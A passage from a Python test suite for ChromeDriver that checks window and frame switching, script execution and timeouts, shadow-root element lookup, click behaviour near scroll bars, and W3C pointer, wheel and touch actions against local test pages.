= self._driver.GetCurrentWindowHandle() old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(self._driver, old_handles) self.assertNotEqual(None, new_window_handle) self._driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle()) self.assertRaises(chromedriver.NoSuchElement, self._driver.FindElement, 'css selector', '#link') 
self._driver.SwitchToWindow('oldWindow') self.assertEquals(window1_handle, self._driver.GetCurrentWindowHandle()) def testEvaluateScript(self): self.assertEquals(1, self._driver.ExecuteScript('return 1')) self.assertEquals(None, self._driver.ExecuteScript('')) def testEvaluateScriptWithArgs(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) script = ('document.body.innerHTML = "<div>b</div><div>c</div>";' 'return {stuff: document.querySelectorAll("div")};') stuff = self._driver.ExecuteScript(script)['stuff'] script = 'return arguments[0].innerHTML + arguments[1].innerHTML' self.assertEquals( 'bc', self._driver.ExecuteScript(script, stuff[0], stuff[1])) def testEvaluateInvalidScript(self): self.assertRaises(chromedriver.ChromeDriverException, self._driver.ExecuteScript, '{{{') def testExecuteAsyncScript(self): self._driver.SetTimeouts({'script': 3000}) self.assertRaises( chromedriver.ScriptTimeout, self._driver.ExecuteAsyncScript, 'var callback = arguments[0];' 'setTimeout(function(){callback(1);}, 10000);') self.assertEquals( 2, self._driver.ExecuteAsyncScript( 'var callback = arguments[0];' 'setTimeout(function(){callback(2);}, 300);')) def testExecuteScriptTimeout(self): self._driver.SetTimeouts({'script': 0}) self.assertRaises( chromedriver.ScriptTimeout, self._driver.ExecuteScript, 'return 2') # Regular script can still run afterwards. 
self._driver.SetTimeouts({'script': 1000}) self.assertEquals( 4, self._driver.ExecuteScript('return 4')) def testSwitchToFrame(self): self._driver.ExecuteScript( 'var frame = document.createElement("iframe");' 'frame.id="id";' 'frame.name="name";' 'document.body.appendChild(frame);') self.assertTrue(self._driver.ExecuteScript('return window.top == window')) self._driver.SwitchToFrame('id') self.assertTrue(self._driver.ExecuteScript('return window.top != window')) self._driver.SwitchToMainFrame() self.assertTrue(self._driver.ExecuteScript('return window.top == window')) self._driver.SwitchToFrame('name') self.assertTrue(self._driver.ExecuteScript('return window.top != window')) self._driver.SwitchToMainFrame() self.assertTrue(self._driver.ExecuteScript('return window.top == window')) self._driver.SwitchToFrameByIndex(0) self.assertTrue(self._driver.ExecuteScript('return window.top != window')) self._driver.SwitchToMainFrame() self.assertTrue(self._driver.ExecuteScript('return window.top == window')) self._driver.SwitchToFrame(self._driver.FindElement('tag name', 'iframe')) self.assertTrue(self._driver.ExecuteScript('return window.top != window')) def testSwitchToParentFrame(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/nested.html')) self.assertTrue('One' in self._driver.GetPageSource()) self._driver.SwitchToFrameByIndex(0) self.assertTrue('Two' in self._driver.GetPageSource()) self._driver.SwitchToFrameByIndex(0) self.assertTrue('Three' in self._driver.GetPageSource()) self._driver.SwitchToParentFrame() self.assertTrue('Two' in self._driver.GetPageSource()) self._driver.SwitchToParentFrame() self.assertTrue('One' in self._driver.GetPageSource()) def testSwitchToNestedFrame(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/nested_frameset.html')) self._driver.SwitchToFrameByIndex(0) self._driver.FindElement("css selector", "#link") self._driver.SwitchToMainFrame() self._driver.SwitchToFrame('2Frame') self._driver.FindElement("css 
selector", "#l1") self._driver.SwitchToMainFrame() self._driver.SwitchToFrame('fourth_frame') self.assertTrue('One' in self._driver.GetPageSource()) self._driver.SwitchToMainFrame() self._driver.SwitchToFrameByIndex(4) self._driver.FindElement("css selector", "#aa1") def testExecuteInRemovedFrame(self): self._driver.ExecuteScript( 'var frame = document.createElement("iframe");' 'frame.id="id";' 'frame.name="name";' 'document.body.appendChild(frame);' 'window.addEventListener("message",' ' function(event) { document.body.removeChild(frame); });') self.assertTrue(self._driver.ExecuteScript('return window.top == window')) self._driver.SwitchToFrame('id') self.assertTrue(self._driver.ExecuteScript('return window.top != window')) self._driver.ExecuteScript('parent.postMessage("remove", "*");') self._driver.SwitchToMainFrame() self.assertTrue(self._driver.ExecuteScript('return window.top == window')) def testSwitchToStaleFrame(self): self._driver.ExecuteScript( 'var frame = document.createElement("iframe");' 'frame.id="id";' 'frame.name="name";' 'document.body.appendChild(frame);') element = self._driver.FindElement("css selector", "#id") self._driver.SwitchToFrame(element) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) with self.assertRaises(chromedriver.StaleElementReference): self._driver.SwitchToFrame(element) def testGetTitle(self): script = 'document.title = "title"; return 1;' self.assertEquals(1, self._driver.ExecuteScript(script)) self.assertEquals('title', self._driver.GetTitle()) def testGetPageSource(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) self.assertTrue('Link to empty.html' in self._driver.GetPageSource()) def testGetElementShadowRoot(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html')) element = self._driver.FindElement('tag name', 'custom-checkbox-element') shadow = element.GetElementShadowRoot() self.assertTrue(isinstance(shadow, 
webshadowroot.WebShadowRoot)) def testGetElementShadowRootNotExists(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html')) element = self._driver.FindElement('tag name', 'div') with self.assertRaises(chromedriver.NoSuchShadowRoot): element.GetElementShadowRoot() def testFindElementFromShadowRoot(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html')) element = self._driver.FindElement('tag name', 'custom-checkbox-element') shadow = element.GetElementShadowRoot() self.assertTrue(isinstance(shadow, webshadowroot.WebShadowRoot)) elementInShadow = shadow.FindElement('css selector', 'input') self.assertTrue(isinstance(elementInShadow, webelement.WebElement)) def testFindElementFromShadowRootInvalidArgs(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html')) element = self._driver.FindElement('tag name', 'custom-checkbox-element') shadow = element.GetElementShadowRoot() self.assertTrue(isinstance(shadow, webshadowroot.WebShadowRoot)) with self.assertRaises(chromedriver.InvalidArgument): shadow.FindElement('tag name', 'input') with self.assertRaises(chromedriver.InvalidArgument): shadow.FindElement('xpath', '//') def testDetachedShadowRootError(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html')) element = self._driver.FindElement('tag name', 'custom-checkbox-element') shadow = element.GetElementShadowRoot() self._driver.Refresh() with self.assertRaises(chromedriver.DetachedShadowRoot): shadow.FindElement('css selector', 'input') def testFindElementsFromShadowRoot(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html')) element = self._driver.FindElement('tag name', 'custom-checkbox-element') shadow = element.GetElementShadowRoot() self.assertTrue(isinstance(shadow, webshadowroot.WebShadowRoot)) elementsInShadow = shadow.FindElements('css selector', 'input') 
self.assertTrue(isinstance(elementsInShadow, list)) self.assertTrue(2, len(elementsInShadow)) def testFindElementsFromShadowRootInvalidArgs(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html')) element = self._driver.FindElement('tag name', 'custom-checkbox-element') shadow = element.GetElementShadowRoot() self.assertTrue(isinstance(shadow, webshadowroot.WebShadowRoot)) with self.assertRaises(chromedriver.InvalidArgument): shadow.FindElements('tag name', 'input') with self.assertRaises(chromedriver.InvalidArgument): shadow.FindElements('xpath', '//') def testFindElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>a</div><div>b</div>";') self.assertTrue( isinstance(self._driver.FindElement('tag name', 'div'), webelement.WebElement)) def testNoSuchElementExceptionMessage(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>a</div><div>b</div>";') self.assertRaisesRegexp(chromedriver.NoSuchElement, 'no such element: Unable ' 'to locate element: {"method":"tag name",' '"selector":"divine"}', self._driver.FindElement, 'tag name', 'divine') def testFindElements(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>a</div><div>b</div>";') divs = self._driver.FindElements('tag name', 'div') self.assertTrue(isinstance(divs, list)) self.assertEquals(2, len(divs)) for div in divs: self.assertTrue(isinstance(div, webelement.WebElement)) def testFindChildElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div><br><br></div><div><a></a></div>";') element = self._driver.FindElement('tag name', 'div') self.assertTrue( isinstance(element.FindElement('tag name', 'br'), webelement.WebElement)) 
  def testFindChildElements(self):
    """FindElements scoped to an element returns only descendants."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript(
        'document.body.innerHTML = "<div><br><br></div><div><br></div>";')
    element = self._driver.FindElement('tag name', 'div')
    brs = element.FindElements('tag name', 'br')
    self.assertTrue(isinstance(brs, list))
    # Only the first <div> is searched, so its two <br>s are expected.
    self.assertEquals(2, len(brs))
    for br in brs:
      self.assertTrue(isinstance(br, webelement.WebElement))

  def testClickElement(self):
    """Clicking an element fires its click handler."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    div = self._driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.addEventListener("click", function() {'
        ' div.innerHTML="new<br>";'
        '});'
        'return div;')
    div.Click()
    # The handler rewrote the div's content, adding exactly one <br>.
    self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))

  def testClickElementInSubFrame(self):
    """Clicking works the same after switching into an iframe."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/frame_test.html'))
    frame = self._driver.FindElement('tag name', 'iframe')
    self._driver.SwitchToFrame(frame)
    # Test clicking element in the sub frame.
    self.testClickElement()

  def testClickElementAfterNavigation(self):
    """Elements located after a link navigation are clickable."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html'))
    link = self._driver.FindElement('css selector', '#l1')
    link.Click()
    alert_button = self._driver.FindElement('css selector', '#aa1')
    alert_button.Click()
    self.assertTrue(self._driver.IsAlertOpen())

  def testClickElementJustOutsidePage(self):
    """Clicking scrolls an element into view when it is just off-screen."""
    # https://bugs.chromium.org/p/chromedriver/issues/detail?id=3878
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    windowHeight = self._driver.ExecuteScript('return window.innerHeight;')
    self._driver.ExecuteScript(
        '''
        document.body.innerHTML = "<div style='height:%dpx'></div>" +
            "<a href='#' onclick='return false;' id='link'>Click me</a>";
        document.body.style.cssText = "padding:0.25px";
        ''' % (2 * windowHeight))
    link = self._driver.FindElement('css selector', '#link')
    offsetTop = link.GetProperty('offsetTop')
    # Scroll so the link sits one pixel below the visible viewport.
    targetScrollTop = offsetTop - windowHeight + 1
    self._driver.ExecuteScript('window.scrollTo(0, %d);' % (targetScrollTop));
    link.Click()

  def testClickElementHavingSmallIntersectionWithindowObscuredByScrollBar(self):
    # This is a regression test for chromedriver:3933.
    # It relies on some internal knowledge on how ExecuteClickElement is implemented.
    # See also: https://bugs.chromium.org/p/chromedriver/issues/detail?id=3933
    # This is what happens if the bug exists in the code:
    # Assume:
    #   bar.height = 50.5 (see the CSS from horizontal_scroller.html)
    #   x = 1.5 (can be any 1.5 <= x < 2.5)
    #   horizontalScrollBar.height = 15
    #   p = 36.5 <- position of #link relative to the viewport, calculated and
    #   scrolled to by webdriver::atoms::GET_LOCATION_IN_VIEW
    # Assign:
    #   window.innerHeight = floor(bar.height + x) = 52
    # Then:
    #   horizontalScrollBar.y = window.innerHeight - horizontalScrollBar.height = 37
    #   clickPosition.y = p + (window.innerHeight - bar.height) / 2 = 37.25
    #
    # Condition clickPosition.y > horizontalScrollBar.y means that we are
    # clicking the area obscured by horizontal scroll bar.
    # It is worth mentioning that if x < 1.5 or x >= 2.5 then 'p' will be
    # calculated differently and the bug will not reproduce.
    testcaseUrl = self.GetHttpUrlForFile(
        '/chromedriver/horizontal_scroller.html')
    self._driver.Load(testcaseUrl)
    self._driver.SetWindowRect(640, 480, None, None)
    innerHeight = self._driver.ExecuteScript('return window.innerHeight;')
    # Difference between outer window size and the viewport (borders, etc).
    windowDecorationHeight = 480 - innerHeight
    # The value of barHeight is 50.5
    barHeight = self._driver.FindElement(
        'css selector', '#bar').GetRect()['height']
    x = 1.5 # as mentioned above any number 1.5 <= x < 2.5 is ok provided scroll.height = 15
    windowHeight = barHeight + windowDecorationHeight + x
    self._driver.SetWindowRect(640, windowHeight, None, None)
    self._driver.Load(testcaseUrl)
    link = self._driver.FindElement('css selector', '#link')
    link.Click()
    # Click must be registered
    counter = self._driver.FindElement('css selector', '#click-counter')
    self.assertEqual(1, int(counter.GetProperty('value')))

  def testClickElementObscuredByScrollBar(self):
    """Clicking a link fully hidden by the scroll bar scrolls it into view."""
    testcaseUrl = self.GetHttpUrlForFile(
        '/chromedriver/horizontal_scroller.html')
    self._driver.Load(testcaseUrl)
    self._driver.SetWindowRect(640, 480, None, None)
    innerHeight = self._driver.ExecuteScript('return window.innerHeight;')
    windowDecorationHeight = 480 - innerHeight
    viewportHeight = self._driver.ExecuteScript(
        'return window.visualViewport.height;')
    # Height of the horizontal scroll bar at the bottom of the window.
    scrollbarHeight = innerHeight - viewportHeight
    barHeight = self._driver.FindElement(
        'css selector', '#bar').GetRect()['height']
    # -1 is used to ensure that there is no space for link before the scroll bar.
    self._driver.SetWindowRect(640, math.floor(
        barHeight + windowDecorationHeight + scrollbarHeight - 1), None, None)
    self._driver.Load(testcaseUrl)
    newInnerHeight = self._driver.ExecuteScript('return window.innerHeight;')
    link = self._driver.FindElement('css selector', '#link')
    link.Click()
    rc = self._driver.ExecuteScript(
        'return document.getElementById("link").getBoundingClientRect();')
    # As link was obscured it has to be brought into view
    self.assertLess(0, rc['y'] + rc['height'])
    self.assertLess(rc['y'], newInnerHeight - scrollbarHeight)
    # Click must be registered
    counter = self._driver.FindElement('css selector', '#click-counter')
    self.assertEqual(1, int(counter.GetProperty('value')))

  def testClickElementAlmostObscuredByScrollBar(self):
    """A partially visible link is clicked in place, without scrolling."""
    # https://bugs.chromium.org/p/chromedriver/issues/detail?id=3933
    # This test does not reproduce chromedriver:3933.
    # However it fails if the implementation contains the bug that was
    # responsible for the issue: incorrect calculation of the intersection
    # between the element and the viewport led to scrolling where the element
    # was positioned in such a way that it could not be clicked.
    testcaseUrl = self.GetHttpUrlForFile(
        '/chromedriver/horizontal_scroller.html')
    self._driver.Load(testcaseUrl)
    self._driver.SetWindowRect(640, 480, None, None)
    innerHeight = self._driver.ExecuteScript('return window.innerHeight;')
    windowDecorationHeight = 480 - innerHeight
    viewportHeight = self._driver.ExecuteScript(
        'return window.visualViewport.height;')
    scrollbarHeight = innerHeight - viewportHeight
    barHeight = self._driver.FindElement(
        'css selector', '#bar').GetRect()['height']
    # +1 is used in order to give some space for link before the scroll bar.
    self._driver.SetWindowRect(640, math.floor(
        barHeight + windowDecorationHeight + scrollbarHeight + 1), None, None)
    self._driver.Load(testcaseUrl)
    link = self._driver.FindElement('css selector', '#link')
    rc = self._driver.ExecuteScript(
        'return document.getElementById("link").getBoundingClientRect();')
    oldY = rc['y']
    link.Click()
    rc = self._driver.ExecuteScript(
        'return document.getElementById("link").getBoundingClientRect();')
    # As link is only partially obscured it must stay in place
    self.assertEqual(oldY, rc['y'])
    # Click must be registered
    counter = self._driver.FindElement('css selector', '#click-counter')
    self.assertEqual(1, int(counter.GetProperty('value')))

  def testActionsMouseMove(self):
    """A W3C Actions pointerMove dispatches a mouseover to the target."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.style["width"] = "100px";'
        'div.style["height"] = "100px";'
        'div.addEventListener("mouseover", function() {'
        ' var div = document.getElementsByTagName("div")[0];'
        ' div.innerHTML="new<br>";'
        '});'
        'return div;')
    actions = ({"actions": [{
      "actions": [{"duration": 32, "type": "pause"}],
      "id": "0",
      "type": "none"
      }, {
      "type":"pointer",
      "actions":[{"type": "pointerMove", "x": 10, "y": 10}],
      "parameters": {"pointerType": "mouse"},
      "id": "pointer1"}]})
    self._driver.PerformActions(actions)
    self.assertEquals(1,
                      len(self._driver.FindElements('tag name', 'br')))

  def testActionsMouseClick(self):
    """A pointerDown/pointerUp pair dispatches a click."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.style["width"] = "100px";'
        'div.style["height"] = "100px";'
        'div.addEventListener("click", function() {'
        ' var div = document.getElementsByTagName("div")[0];'
        ' div.innerHTML="new<br>";'
        '});'
        'return div;')
    actions = ({"actions": [{
      "type":"pointer",
      "actions":[{"type": "pointerMove", "x": 10, "y": 10},
                 {"type": "pointerDown", "button": 0},
                 {"type": "pointerUp", "button": 0}],
      "parameters": {"pointerType": "mouse"},
      "id": "pointer1"}]})
    self._driver.PerformActions(actions)
    self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))

  def testActionsMouseDoubleClick(self):
    """Two click pairs in one action sequence produce a dblclick."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.style["width"] = "100px";'
        'div.style["height"] = "100px";'
        'div.addEventListener("dblclick", function() {'
        ' var div = document.getElementsByTagName("div")[0];'
        ' div.innerHTML="new<br>";'
        '});'
        'return div;')
    actions = ({"actions": [{
      "type":"pointer",
      "actions":[{"type": "pointerMove", "x": 10, "y": 10},
                 {"type": "pointerDown", "button": 0},
                 {"type": "pointerUp", "button": 0},
                 {"type": "pointerDown", "button": 0},
                 {"type": "pointerUp", "button": 0}],
      "parameters": {"pointerType": "mouse"},
      "id": "pointer1"}]})
    self._driver.PerformActions(actions)
    self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))

  def testActionsMouseTripleClick(self):
    """Three click pairs yield click events with detail 1, 2 and 3."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.style["width"] = "100px";'
        'div.style["height"] = "100px";'
        'window.click_counts = [];'
        'div.addEventListener("click", event => {'
        ' window.click_counts.push(event.detail);'
        '});'
        'return div;')
    actions = ({"actions": [{
      "type":"pointer",
      "actions":[{"type": "pointerMove", "x": 10, "y": 10},
                 {"type": "pointerDown", "button": 0},
                 {"type": "pointerUp", "button": 0},
                 {"type": "pointerDown", "button": 0},
                 {"type": "pointerUp", "button": 0},
                 {"type": "pointerDown", "button": 0},
                 {"type": "pointerUp", "button": 0}],
      "parameters": {"pointerType": "mouse"},
      "id": "pointer1"}]})
    self._driver.PerformActions(actions)
    click_counts = self._driver.ExecuteScript('return window.click_counts')
    # event.detail carries the running click count for multi-clicks.
    self.assertEquals(3, len(click_counts))
    self.assertEquals(1, click_counts[0])
    self.assertEquals(2, click_counts[1])
    self.assertEquals(3, click_counts[2])

  def testActionsMouseResetCountOnOtherButton(self):
    """Pressing a different button resets the multi-click count."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.style["width"] = "100px";'
        'div.style["height"] = "100px";'
        'div.addEventListener("dblclick", function() {'
        ' var div = document.getElementsByTagName("div")[0];'
        ' div.innerHTML="new<br>";'
        '});'
        'return div;')
    actions = ({"actions": [{
      "type":"pointer",
      "actions":[{"type": "pointerMove", "x": 10, "y": 10},
                 {"type": "pointerDown", "button": 0},
                 {"type": "pointerUp", "button": 0},
                 {"type": "pointerDown", "button": 1},
                 {"type": "pointerUp", "button": 1}],
      "parameters": {"pointerType": "mouse"},
      "id": "pointer1"}]})
    self._driver.PerformActions(actions)
    # No dblclick fired, so the handler never ran.
    self.assertEquals(0, len(self._driver.FindElements('tag name', 'br')))

  def testActionsMouseResetCountOnMove(self):
    """Moving the pointer between clicks resets the multi-click count."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.style["width"] = "100px";'
        'div.style["height"] = "100px";'
        'div.addEventListener("dblclick", function() {'
        ' var div = document.getElementsByTagName("div")[0];'
        ' div.innerHTML="new<br>";'
        '});'
        'return div;')
    actions = ({"actions": [{
      "type":"pointer",
      "actions":[{"type": "pointerMove", "x": 10, "y": 10},
                 {"type": "pointerDown", "button": 0},
                 {"type": "pointerUp", "button": 0},
                 {"type": "pointerMove", "x": 30, "y": 10},
                 {"type": "pointerDown", "button": 0},
                 {"type": "pointerUp", "button": 0}],
      "parameters": {"pointerType": "mouse"},
      "id": "pointer1"}]})
    self._driver.PerformActions(actions)
    # The intervening move prevented a dblclick, so nothing was inserted.
    self.assertEquals(0, len(self._driver.FindElements('tag name', 'br')))

  def testActionsMouseDrag(self):
    """Drag state persists across PerformActions calls until pointerUp."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/drag.html'))
    target = self._driver.FindElement('css selector', '#target')
    # Move to center of target element and drag it to a new location.
    actions = ({'actions': [{
      "actions": [{"duration": 32, "type": "pause"},
                  {"duration": 32, "type": "pause"},
                  {"duration": 32, "type": "pause"}],
      "id": "0",
      "type": "none"
      }, {
      'type': 'pointer',
      'actions': [
          {'type': 'pointerMove', 'x': 100, 'y': 100},
          {'type': 'pointerDown', 'button': 0},
          {'type': 'pointerMove', 'x': 150, 'y': 175}
      ],
      'parameters': {'pointerType': 'mouse'},
      'id': 'pointer1'}]})
    time.sleep(1)
    self._driver.PerformActions(actions)
    time.sleep(1)
    rect = target.GetRect()
    self.assertAlmostEqual(100, rect['x'], delta=1)
    self.assertAlmostEqual(125, rect['y'], delta=1)
    # Without releasing mouse button, should continue the drag.
    actions = ({'actions': [{
      "actions": [{"duration": 32, "type": "pause"}],
      "id": "0",
      "type": "none"
      }, {
      'type': 'pointer',
      'actions': [
          {'type': 'pointerMove', 'x': 15, 'y': 20, 'origin': 'pointer'}
      ],
      'parameters': {'pointerType': 'mouse'},
      'id': 'pointer1'}]})
    time.sleep(1)
    self._driver.PerformActions(actions)
    time.sleep(1)
    rect = target.GetRect()
    self.assertAlmostEqual(115, rect['x'], delta=1)
    self.assertAlmostEqual(145, rect['y'], delta=1)
    # Releasing mouse button stops the drag.
    actions = ({'actions': [{
      "actions": [{"duration": 32, "type": "pause"},
                  {"duration": 32, "type": "pause"}],
      "id": "0",
      "type": "none"
      }, {
      'type': 'pointer',
      'actions': [
          {'type': 'pointerUp', 'button': 0},
          {'type': 'pointerMove', 'x': 25, 'y': 25, 'origin': 'pointer'}
      ],
      'parameters': {'pointerType': 'mouse'},
      'id': 'pointer1'}]})
    time.sleep(1)
    self._driver.PerformActions(actions)
    time.sleep(1)
    rect = target.GetRect()
    # Position unchanged: the move after pointerUp must not drag.
    self.assertAlmostEqual(115, rect['x'], delta=1)
    self.assertAlmostEqual(145, rect['y'], delta=1)

  def testActionsWheelScroll(self):
    """A wheel-input scroll action dispatches a wheel event."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.style["width"] = "100px";'
        'div.style["height"] = "1000px";'
        'div.addEventListener("wheel", function() {'
        ' var div = document.getElementsByTagName("div")[0];'
        ' div.innerHTML="new<br>";'
        '});'
        'return div;')
    time.sleep(1)
    actions = ({"actions": [{
      "type":"wheel",
      "actions":[{"type": "scroll", "x": 10, "y": 10,
                  "deltaX": 5, "deltaY": 15}],
      "id": "wheel1"}]})
    time.sleep(1)
    self._driver.PerformActions(actions)
    time.sleep(1)
    self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))

  def testActionsTouchTap(self):
    """A touch pointerDown/pointerUp pair produces a click."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.style["width"] = "100px";'
        'div.style["height"] = "100px";'
        'div.addEventListener("click", function() {'
        ' var div = document.getElementsByTagName("div")[0];'
        ' div.innerHTML="new<br>";'
        '});'
        'return div;')
    actions = ({"actions": [{
      "type":"pointer",
      "actions":[{"type": "pointerMove", "x": 10, "y": 10},
                 {"type": "pointerDown"},
                 {"type": "pointerUp"}],
      "parameters": {"pointerType": "touch"},
      "id": "pointer1"}]})
    self._driver.PerformActions(actions)
    self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))

  def testActionsMultiTouchPoint(self):
    """Two touch input sources generate two touch points."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript(
        '''
        document.body.innerHTML
            = "<div id='div' autofocus style='width:200px; height:200px'>";
        window.events = [];
        const div = document.getElementById('div');
        div.addEventListener('touchstart', event => {
          window.events.push(
              {type: event.type,
               x: event.touches[event.touches.length - 1].clientX,
               y: event.touches[event.touches.length - 1].clientY});
        });
        div.addEventListener('touchend', event => {
          window.events.push(
              {type: event.type});
        });
        ''')
    time.sleep(1)
    actions = ({"actions": [{
      "type":"pointer",
      "actions":[{"type": "pointerMove", "x": 50, "y": 50},
                 {"type": "pointerDown"},
                 {"type": "pointerUp"}],
      "parameters": {"pointerType": "touch"},
      "id": "pointer1"}, {
      "type":"pointer",
      "actions":[{"type": "pointerMove", "x": 60, "y": 60},
                 {"type": "pointerDown"},
                 {"type": "pointerUp"}],
      "parameters": {"pointerType": "touch"},
      "id": "pointer2"}]})
    self._driver.PerformActions(actions)
    time.sleep(1)
    events = self._driver.ExecuteScript('return window.events')
    # Two touchstarts (one per pointer) followed by two touchends.
    self.assertEquals(4, len(events))
    self.assertEquals("touchstart", events[0]['type'])
    self.assertEquals("touchstart", events[1]['type'])
    self.assertEquals("touchend", events[2]['type'])
    self.assertEquals("touchend", events[3]['type'])
    self.assertAlmostEqual(50, events[0]['x'], delta=1)
    self.assertAlmostEqual(50, events[0]['y'], delta=1)
    self.assertAlmostEqual(60, events[1]['x'], delta=1)
    self.assertAlmostEqual(60, events[1]['y'], delta=1)
    self._driver.ReleaseActions()

  def testActionsMulti(self):
    """Pointer position is remembered between PerformActions calls."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript(
        '''
        document.body.innerHTML
            = "<div id='div' autofocus style='width:200px; height:200px'>";
        window.events = [];
        const div = document.getElementById('div');
        div.addEventListener('click', event => {
          window.events.push(
              {x: event.clientX,
               y: event.clientY});
        });
        ''')
    # Move mouse to (50, 50).
    self._driver.PerformActions({'actions': [
        {
            'type': 'pointer',
            'id': 'mouse',
            'actions': [
                {'type': 'pointerMove', 'x': 50, 'y': 50}
            ]
        }
    ]})
    # Click mouse button. ChromeDriver should remember that mouse is at
    # (50, 50).
    self._driver.PerformActions({'actions': [
        {
            'type': 'pointer',
            'id': 'mouse',
            'actions': [
                {'type': 'pointerDown', "button": 0},
                {'type': 'pointerUp', "button": 0}
            ]
        }
    ]})
    events = self._driver.ExecuteScript('return window.events')
    self.assertEquals(1, len(events))
    self.assertAlmostEqual(50, events[0]['x'], delta=1)
    self.assertAlmostEqual(50, events[0]['y'], delta=1)
    # Clean up action states, move mouse back to (0, 0).
    self._driver.ReleaseActions()
    # Move mouse relative by (80, 80) pixels, and then click.
    self._driver.PerformActions({'actions': [
        {
            'type': 'pointer',
            'id': 'mouse',
            'actions': [
                {'type': 'pointerMove', 'x': 80, 'y': 80, 'origin': 'pointer'},
                {'type': 'pointerDown', "button": 0},
                {'type': 'pointerUp', "button": 0}
            ]
        }
    ]})
    events = self._driver.ExecuteScript('return window.events')
    self.assertEquals(2, len(events))
    self.assertAlmostEqual(80, events[1]['x'], delta=1)
    self.assertAlmostEqual(80, events[1]['y'], delta=1)
    self._driver.ReleaseActions()

  def testActionsPenPointerEventProperties(self):
    """Pointer event properties (pressure, tilt, twist) are forwarded."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript(
        '''
        document.body.innerHTML = "<div>test</div>";
        var div = document.getElementsByTagName("div")[0];
        div.style["width"] = "100px";
        div.style["height"] = "100px";
        window.events = [];
        div.addEventListener("pointerdown", event => {
          window.events.push(
              {type: event.type,
               x: event.clientX,
               y: event.clientY,
               width: event.width,
               height: event.height,
               pressure: event.pressure,
               tiltX: event.tiltX,
               tiltY: event.tiltY,
               twist: event.twist});
        });
        ''')
    time.sleep(1)
    actions = ({"actions": [{
      "type":"pointer",
      "actions":[{"type": "pointerMove", "x": 30, "y": 30},
                 {"type": "pointerDown", "button": 0, "pressure":0.55,
                  "tiltX":-36, "tiltY":83, "twist":266},
                 {"type": "pointerMove", "x": 50, "y": 50},
                 {"type": "pointerUp", "button": 0}],
      "parameters": {"pointerType": "mouse"},
      "id": "pointer1"}]})
    self._driver.PerformActions(actions)
    time.sleep(1)
    events = self._driver.ExecuteScript('return window.events')
    self.assertEquals(1, len(events))
    self.assertEquals("pointerdown", events[0]['type'])
    self.assertAlmostEqual(30, events[0]['x'], delta=1)
